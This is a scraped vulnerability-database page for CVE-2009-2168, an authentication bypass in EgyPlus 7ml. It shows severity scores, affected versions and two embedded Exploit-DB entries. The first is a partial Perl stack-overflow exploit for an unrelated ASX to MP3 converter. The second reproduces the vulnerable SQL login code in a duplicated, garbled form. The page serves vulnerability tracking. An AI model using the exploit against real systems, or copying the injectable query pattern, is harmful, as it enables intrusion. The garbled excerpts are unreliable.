CVE-2009-2168
published 2009-06-22CVE-2009-2168: cpanel/login.php in EgyPlus 7ammel (aka 7ml) 1.0.1 and earlier sends a redirect to the web browser but does not exit when the supplied credentials are…
PriorityP359critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
11.78%
95.6th percentile
cpanel/login.php in EgyPlus 7ammel (aka 7ml) 1.0.1 and earlier sends a redirect to the web browser but does not exit when the supplied credentials are incorrect, which allows remote attackers to bypass authentication by providing arbitrary username and password parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| egyplus | 7ammel | <= 1.0.1 | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Asx to Mp3 2.7.5 - Local Stack Overflow
exploitdb·2014-10-07
CVE-2009-1324 Asx to Mp3 2.7.5 - Local Stack Overflow
Asx to Mp3 2.7.5 - Local Stack Overflow
---
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
Exploit-DB
EgyPlus 7ml 1.0.1 - Authentication Bypass
exploitdb·2009-06-03
CVE-2009-2168 EgyPlus 7ml 1.0.1 - Authentication Bypass
EgyPlus 7ml 1.0.1 - Authentication Bypass
---
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait, PEACE...
=Vuln: EgyPlus 7ml query("select name,pass from admin where
name = '$username' and
pass = '$password' ");
$AdminInfo=$hazemali->num_rows($sql);
if($AdminInfo==1) query("select name,pass from admin where
name = '$username' and
pass = '$password' ");
$AdminInfo=$hazemali->num_rows($sql);
if($AdminInfo==1)
{
-=-=-=-==Bdon-=-za3al=-=-shabab-=-=el-thaghra-=-mafe=--=Mnha=--=-faydeh-==-==-=-
=-=-=-=-==-=-=-=-=-=-No----More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
Salam to All Muslim Hackers.
# milw0rm.com [2009-06-03]
No writeups or analysis indexed.
2009-06-22
Published